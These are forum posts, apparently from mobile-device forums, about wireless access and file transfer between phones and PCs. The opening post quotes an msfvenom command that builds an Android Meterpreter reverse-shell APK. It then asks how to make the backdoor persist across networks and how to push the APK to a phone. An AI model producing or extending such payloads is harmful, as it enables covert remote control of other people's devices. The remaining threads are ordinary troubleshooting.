Hello, soo im trying to open a link to my phine that I can access anytime but it seems to only work once using this method
msfvenom -p android/meterpreter/reverse_tcp LHOST=***.***.*** LPORT=**** R > /***/***/***.apk
is there anyway I can open a back door that I can access even what my phone isn't on my home wifi but on other wifi/cell data??
also I was wondering if there was a way to send myself the apk wirelessly like a push notification from pc??
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hi!
I just managed to get my wifi connection working. I have created an adhoc based connection with my laptop. I have complete access to the drive(s) on the laptop now without problems.
However I still couldn't find a way to get terminal services working :-(
I tried the entering the IP and the computer's name....futile :-s
it keeps giving the error "Connection timed out"...
Am I doing something wrong?
Thanks,
San
Assuming you have XP Pro, go to control panel > system > remote tab, and switch on "allow users to connect..." tick box.
Otherwise you need terminal server dedicated.
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Got a similar problem to this. I cant get the terminal server client to work over wifi. It works fine if it connects through GPRS but not WIFI, its as if its not even trying to use wifi. Other things like IE and msn messenger all work throught wifi fine.
found the answer in another post... add the local server address as exceptions. Go to the connections menu then click on connections\advanced
Does anyone knows can i send and recieve files over wifi like the iphone. My phone is a htc prophet.
not generic way iphones are very closed platforms
if you can find a program which does it and is available for both iphones and wm then yes
otherwise you can use dropbox or livedrive or gmail and using the internet as middle station
so does anyone knows where to find such a program.
Google it and you will gett the path
do you mean datatransfer over wifi without being connected to the internet?
yes to send files from one phone to other over wifi without being connected to internet
WiFi Remote Access will solve your purpose.
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no this is from ppc to pc, we want to transfer files from ppc to ppc!!
mare123 said:
no this is from ppc to pc, we want to transfer files from ppc to ppc!!
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I think you can...
Lets assume, PPC1 has been configured with WiFi Remote Access.
Create an ad-hoc Open WiFi network from PPC2.
Connect PPC1 to this network.
Turn on WiFi Remote Access.
The PPC1 behaves as a server.
Open a Browser on PPC2.
Try opening the server address (as displayed on WiFi Remote Access Interface on PPC1. This is device specific).
A page should open.
Perform the password authentication on both devices, as will be prompted.
Try downloading the file from yor PPC1, the way you download usually through your browser on PPC2.
Its technically possible.
I don't have two PPCs with me to try this.
But, technically speaking, it should run flawless.
But, again you need lots of RAM on both the devices, specially on PPC2.
But, you must have a bit experience to use it properly.
And, only using it can help you know it!!!
Isn't that?
So please Use it, then reply back.
And, if this works, it can be used as a two-way protocol also.
Best of Luck guys.
today i tried it and it works perfect i transfer files much more faster than with bluetooth thanks for your help
Hello all,
I have been searching the forum but could not find an answer to my question. I have installed a TightVNC server on my dekstop in order to remotly control it by my HTC desire. It works great with the android VNC app.
But the thing is, i only want to send a command line to my PC without using the whole app. I'm designing my own app where i want to send a command lines to my computer. It's just a simple app with a few buttons in order to switch my lights on and off in my room. I have running it on my PC right now with winlirc, which can be controlled by entering a command line.
Is there anyone who can provide me with the Code that connects to the server and can send a command line? If it is not possible to send a command line, then maybe just a way to send a keystroke so i can use autohotkey to act upon it.
Thanks
Have you tried SSH?
I'm working on a windows PC with openSSH at the moment.
But that is just in order to create a secure channel. Don't need it right now since i'm only working in LAN area. Just need the source code that i can put in my app in order to send a command/keystroke
Hi,
I'm working to get reverse tethering (internet passthrough) working through a Linux pc. The app that comes with the phone is for Windows only. I have got to the stage where I can bridge the interfaces on the pc, get a dhcp address on the phone's usb interface, set the route and access the internet (from some apps). However, other apps don't even bother to try to connect if the phone tells them it has no access. This must be set in a property somewhere, but I don't know where? Can anybody help find it and tell me how to set it?
Cheers!
They probably only ask this class, directly or automatically when creating a connection :
http://developer.android.com/reference/android/net/ConnectivityManager.html
You will probably need to browse the Android SDK sources, but looking at this class, this will not help you much as the connectivity itself is hidden behind a IDL interface :
http://android.git.kernel.org/?p=pl...ore/java/android/net/ConnectivityManager.java
Thanks for the reply faugusztin.
Sounds too complex for me to set, unless there are ways to do this indirectly.
Is there an app that I can use to connect to my computer and do file transfers wirelessly? Or perhaps a hack..
What exactly are you trying to transfer? I use DropBox all the time and you can share files with other devices/people as well, follow that link for extra storage.
Ive also used a comp w/ bluetooth to transfer a bunch of pictures to my Atrix one time..
If your wanting to sync your entire iTunes library, you might give this a try: http://goo.gl/hVxxf
I use ES File Explorer, free in the market. It acts as a file explorer on your atrix, but can also set up LAN locations via ip addresses. With that you can easily copy files from your phone to computer and vice versa as long as both are on the same network.
Just hate having to take my sd card out all the time or moving my charger around. Just transfering music, videos and pics.
Apps Drawer > Phone Portal > Connect with Wifi
In your browser, connect to your phone by typing in your phones IP address followed by :8080 and you will connect to the phone portal which will allow you to manage your phone wirelessly.
Use IE 7 or Firefox 3 if possible as they are the most compatible with the software.
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Apps Drawer > Phone Portal > Connect with Wifi
In your browser, connect to your phone by typing in your phones IP address followed by :8080 and you will connect to the phone portal which will allow you to manage your phone wirelessly.
Use IE 7 or Firefox 3 if possible as they are the most compatible with the software.
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This is awesome! I did not know this was possible, thanks for the tip! Just sent a text from my computer.
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This is awesome! I did not know this was possible, thanks for the tip! Just sent a text from my computer.
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Quite welcome. You can also do this while plugged into USB if you are low on battery or whatever else.
Ever since the .83 update I have horrible signal in my house. I typically just leave my phone in another room lately where I get decent signal and use the BT headset for calls and then use my desktop or laptop for txting.
I have been using PhoneExplorer.. its free from the market. It will sync Outlook if you need that, it lets you run your texts in chat windows, and it syncs files and pictures as well as lets you upload and download to the phone. It supports wifi, bluetooth, and usb connections.
When I tried PhonePortal, I couldn't get to my files... I might have to try it again.